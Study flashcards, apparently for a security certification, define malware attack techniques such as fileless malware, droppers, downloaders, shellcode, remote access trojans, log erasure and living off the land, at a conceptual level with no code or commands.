Section 6.57 Malware Attack Techniques Flashcards
Objectives 2.4 Given a Scenario, analyse indicators of malicious activity
Malware Attack Techniques
Specific method by which malware code penetrates and infects a targeted system
Some malware focuses on infecting the system’s memory to leverage remote procedure calls over the organization’s network
■ Most modern malware uses fileless techniques to avoid detection by
signature-based security software
■ Fileless Malware is used to create a process in the system memory without relying on the local file system of the infected host
How does this modern malware work?
When a user accidentally clicks on a malicious link or opens a malicious file, the specific type of malware being installed is known as a stage one dropper or downloader
Stage 1 Dropper or Downloader
Piece of malware that is usually created as a lightweight shellcode
that can be executed on a given system
Dropper
Specific malware type designed to initiate or run other malware
forms within a payload on an infected host
Downloader
Retrieve additional tools post the initial infection facilitated by a
dropper
The primary function of a stage one dropper or downloader is to retrieve
additional portions of the malware code and to trick the user into activating it
Shellcode
Broader term that encompasses lightweight code meant to
execute an exploit on a given target
Stage 2: Downloader
Downloads and installs a remote access Trojan to conduct command and control on the victimised system
“Actions on Objectives” Phase
Threat actors will execute primary objectives to meet core objectives like
■ data exfiltration
■ file encryption
Concealment
Used to help the threat actor prolong unauthorised access to a system by
■ hiding tracks
■ erasing log files
■ hiding any evidence of malicious activity
“Living off the Land”
■ A strategy adopted by many Advanced Persistent Threats
and criminal organizations
■ The threat actors try to exploit the standard tools to
perform intrusions